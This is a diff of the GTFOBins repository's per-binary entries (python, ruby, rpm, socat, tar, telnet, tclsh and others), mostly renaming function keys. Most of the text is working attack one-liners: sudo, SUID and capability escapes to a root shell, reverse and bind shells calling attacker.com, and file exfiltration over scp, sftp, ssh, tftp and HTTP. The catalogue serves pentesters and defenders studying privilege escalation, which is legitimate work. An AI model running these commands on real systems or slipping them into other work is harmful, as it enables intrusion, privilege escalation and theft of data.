[os.dup2(s.fileno(),fd) for fd in (0,1,2)] [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' pty.spawn("/bin/sh")'
upload: file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: | code: |
export URL=http://attacker.com/ export URL=http://attacker.com/
@ -28,7 +28,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
@ -41,12 +41,12 @@ functions:
- code: python -c 'open("file_to_write","w+").write("DATA")' - code: python -c 'open("file_to_write","w+").write("DATA")'
file-read: file-read:
- code: python -c 'print(open("file_to_read").read())' - code: python -c 'print(open("file_to_read").read())'
load-library: library-load:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid:
- code: ./python -c 'import os; os.system("/bin/sh -p")' - code: ./python -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo:
- code: sudo python -c 'import os; os.system("/bin/sh")' - code: sudo python -c 'import os; os.system("/bin/sh")'
capabilities-enabled: capabilities:
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")' - code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
--- ---

6
_gtfobins/rlwrap.md
View File

@ -1,14 +1,14 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external `echo` command. - description: This adds timestamps to the output file. This relies on the external `echo` command.
code: | code: |
LFILE=file_to_write LFILE=file_to_write
rlwrap -l "$LFILE" echo DATA rlwrap -l "$LFILE" echo DATA
suid-enabled: suid:
- code: ./rlwrap -H /dev/null /bin/sh -p - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---

6
_gtfobins/rpm.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

6
_gtfobins/rpmquery.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
--- ---

6
_gtfobins/rsync.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo-enabled: sudo:
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
suid-enabled: suid:
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
--- ---

14
_gtfobins/ruby.md
View File

@ -1,19 +1,19 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: ruby -e 'exec "/bin/sh"' - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: file-upload:
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later. - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: | code: |
export LPORT=8888 export LPORT=8888
ruby -run -e httpd . -p $LPORT ruby -run -e httpd . -p $LPORT
download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
@ -25,10 +25,10 @@ functions:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }' - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
file-read: file-read:
- code: ruby -e 'puts File.read("file_to_read")' - code: ruby -e 'puts File.read("file_to_read")'
load-library: library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled: sudo:
- code: sudo ruby -e 'exec "/bin/sh"' - code: sudo ruby -e 'exec "/bin/sh"'
capabilities-enabled: capabilities:
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"' - code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
--- ---

10
_gtfobins/scp.md
View File

@ -1,30 +1,30 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF" chmod +x "$TF"
scp -S $TF x y: scp -S $TF x y:
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
sudo-enabled: sudo:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF" chmod +x "$TF"
sudo scp -S $TF x y: sudo scp -S $TF x y:
suid-limited: limited-suid:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF echo 'sh 0<&2 1>&2' > $TF

8
_gtfobins/sed.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sed -n '1e exec sh 1>&0' /etc/hosts code: sed -n '1e exec sh 1>&0' /etc/hosts
execute-non-interactive: command:
- description: GNU version only. - description: GNU version only.
code: sed -n "1e id" /etc/hosts code: sed -n "1e id" /etc/hosts
file-write: file-write:
@ -14,11 +14,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sed '' "$LFILE" sed '' "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sed -e '' "$LFILE" ./sed -e '' "$LFILE"
sudo-enabled: sudo:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
--- ---

6
_gtfobins/setarch.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid:
- code: ./setarch $(arch) /bin/sh -p - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---

8
_gtfobins/sftp.md
View File

@ -1,23 +1,23 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sftp $HOST sftp $HOST
!/bin/sh !/bin/sh
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send file_to_save put file_to_send file_to_save
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get file_to_save get file_to_get file_to_save
sudo-enabled: sudo:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sudo sftp $HOST sudo sftp $HOST

4
_gtfobins/shuf.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
shuf -e DATA -o "$LFILE" shuf -e DATA -o "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
./shuf -e DATA -o "$LFILE" ./shuf -e DATA -o "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sudo shuf -e DATA -o "$LFILE" sudo shuf -e DATA -o "$LFILE"

4
_gtfobins/smbclient.md
View File

@ -1,11 +1,11 @@
--- ---
description: A valid SMB/CIFS server must be available. description: A valid SMB/CIFS server must be available.
functions: functions:
execute-interactive: shell:
- code: | - code: |
smbclient \\ip\share smbclient \\ip\share
!/bin/sh !/bin/sh
sudo-enabled: sudo:
- code: | - code: |
sudo smbclient \\ip\share sudo smbclient \\ip\share
!/bin/sh !/bin/sh

8
_gtfobins/socat.md
View File

@ -1,23 +1,23 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell. - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
sudo-enabled: sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
suid-limited: limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

4
_gtfobins/sort.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sort -m "$LFILE" sort -m "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sort -m "$LFILE" ./sort -m "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo sort -m "$LFILE" sudo sort -m "$LFILE"

6
_gtfobins/sqlite3.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: sqlite3 /dev/null '.shell /bin/sh' - code: sqlite3 /dev/null '.shell /bin/sh'
file-write: file-write:
- code: | - code: |
@ -14,8 +14,8 @@ functions:
.import $LFILE t .import $LFILE t
SELECT * FROM t; SELECT * FROM t;
EOF EOF
sudo-enabled: sudo:
- code: sudo sqlite3 /dev/null '.shell /bin/sh' - code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited: limited-suid:
- code: "./sqlite3 /dev/null '.shell /bin/sh'" - code: "./sqlite3 /dev/null '.shell /bin/sh'"
--- ---

8
_gtfobins/ssh.md
View File

@ -1,18 +1,18 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: Reconnecting may help bypassing restricted shells. - description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option. - description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
upload: file-upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
RPATH=file_to_save RPATH=file_to_save
LPATH=file_to_send LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH ssh $HOST "cat > $RPATH" < $LPATH
download: file-download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
HOST=user@attacker.com HOST=user@attacker.com
@ -24,7 +24,7 @@ functions:
code: | code: |
LFILE=file_to_read LFILE=file_to_read
ssh -F $LFILE localhost ssh -F $LFILE localhost
sudo-enabled: sudo:
- description: Spawn interactive root shell through ProxyCommand option. - description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
--- ---

6
_gtfobins/stdbuf.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: stdbuf -i0 /bin/sh - code: stdbuf -i0 /bin/sh
suid-enabled: suid:
- code: ./stdbuf -i0 /bin/sh -p - code: ./stdbuf -i0 /bin/sh -p
sudo-enabled: sudo:
- code: sudo stdbuf -i0 /bin/sh - code: sudo stdbuf -i0 /bin/sh
--- ---

6
_gtfobins/strace.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: strace -o /dev/null /bin/sh - code: strace -o /dev/null /bin/sh
suid-enabled: suid:
- code: ./strace -o /dev/null /bin/sh -p - code: ./strace -o /dev/null /bin/sh -p
sudo-enabled: sudo:
- code: sudo strace -o /dev/null /bin/sh - code: sudo strace -o /dev/null /bin/sh
--- ---

4
_gtfobins/tail.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
tail -c1G "$LFILE" tail -c1G "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./tail -c1G "$LFILE" ./tail -c1G "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo tail -c1G "$LFILE" sudo tail -c1G "$LFILE"

8
_gtfobins/tar.md
View File

@ -1,8 +1,8 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive: command:
- description: This only works for GNU tar. - description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"' code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write: file-write:
@ -17,8 +17,8 @@ functions:
code: | code: |
LFILE=file_to_read LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"' tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled: sudo:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited: limited-suid:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
--- ---

6
_gtfobins/taskset.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: taskset 1 /bin/sh - code: taskset 1 /bin/sh
suid-enabled: suid:
- code: ./taskset 1 /bin/sh -p - code: ./taskset 1 /bin/sh -p
sudo-enabled: sudo:
- code: sudo taskset 1 /bin/sh - code: sudo taskset 1 /bin/sh
--- ---

8
_gtfobins/tclsh.md
View File

@ -1,20 +1,20 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: | - code: |
tclsh tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive: non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled: suid:
- code: | - code: |
./tclsh ./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled: sudo:
- code: | - code: |
sudo tclsh sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr exec /bin/sh <@stdin >@stdout 2>@stderr

4
_gtfobins/tcpdump.md
View File

@ -1,14 +1,14 @@
--- ---
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
functions: functions:
execute-non-interactive: command:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
sudo-enabled: sudo:
- code: | - code: |
COMMAND='id' COMMAND='id'
TF=$(mktemp) TF=$(mktemp)

4
_gtfobins/tee.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | ./tee -a "$LFILE" echo DATA | ./tee -a "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | ./tee -a "$LFILE" echo DATA | ./tee -a "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE" echo DATA | sudo tee -a "$LFILE"

8
_gtfobins/telnet.md
View File

@ -1,6 +1,6 @@
--- ---
functions: functions:
execute-interactive: shell:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@ -8,14 +8,14 @@ functions:
telnet $RHOST $RPORT telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
reverse-shell-interactive: reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
TF=$(mktemp -u) TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled: sudo:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
@ -23,7 +23,7 @@ functions:
sudo telnet $RHOST $RPORT sudo telnet $RHOST $RPORT
^] ^]
!/bin/sh !/bin/sh
suid-limited: limited-suid:
- description: BSD version only. Needs to be connected first. - description: BSD version only. Needs to be connected first.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

8
_gtfobins/tftp.md
View File

@ -1,24 +1,24 @@
--- ---
functions: functions:
upload: file-upload:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
put file_to_send put file_to_send
download: file-download:
- description: Fetch a remote file from a TFTP server. - description: Fetch a remote file from a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
tftp $RHOST tftp $RHOST
get file_to_get get file_to_get
suid-enabled: suid:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
./tftp $RHOST ./tftp $RHOST
put file_to_send put file_to_send
sudo-enabled: sudo:
- description: Send local file to a TFTP server. - description: Send local file to a TFTP server.
code: | code: |
RHOST=attacker.com RHOST=attacker.com

6
_gtfobins/time.md
View File

@ -1,10 +1,10 @@
--- ---
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path. description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions: functions:
execute-interactive: shell:
- code: /usr/bin/time /bin/sh - code: /usr/bin/time /bin/sh
suid-enabled: suid:
- code: ./time /bin/sh -p - code: ./time /bin/sh -p
sudo-enabled: sudo:
- code: sudo /usr/bin/time /bin/sh - code: sudo /usr/bin/time /bin/sh
--- ---

6
_gtfobins/timeout.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: timeout 7d /bin/sh - code: timeout 7d /bin/sh
suid-enabled: suid:
- code: ./timeout 7d /bin/sh -p - code: ./timeout 7d /bin/sh -p
sudo-enabled: sudo:
- code: sudo timeout --foreground 7d /bin/sh - code: sudo timeout --foreground 7d /bin/sh
--- ---

4
_gtfobins/ul.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
ul "$LFILE" ul "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./ul "$LFILE" ./ul "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo ul "$LFILE" sudo ul "$LFILE"

4
_gtfobins/unexpand.md
View File

@ -4,11 +4,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
unexpand -t99999999 "$LFILE" unexpand -t99999999 "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./unexpand -t99999999 "$LFILE" ./unexpand -t99999999 "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE" sudo unexpand -t99999999 "$LFILE"

4
_gtfobins/uniq.md
View File

@ -5,11 +5,11 @@ functions:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
uniq "$LFILE" uniq "$LFILE"
suid-enabled: suid:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./uniq "$LFILE" ./uniq "$LFILE"
sudo-enabled: sudo:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo uniq "$LFILE" sudo uniq "$LFILE"

6
_gtfobins/unshare.md
View File

@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: shell:
- code: unshare /bin/sh - code: unshare /bin/sh
suid-enabled: suid:
- code: ./unshare -r /bin/sh - code: ./unshare -r /bin/sh
sudo-enabled: sudo:
- code: sudo unshare /bin/sh - code: sudo unshare /bin/sh
--- ---

Some files were not shown because too many files have changed in this diff Show More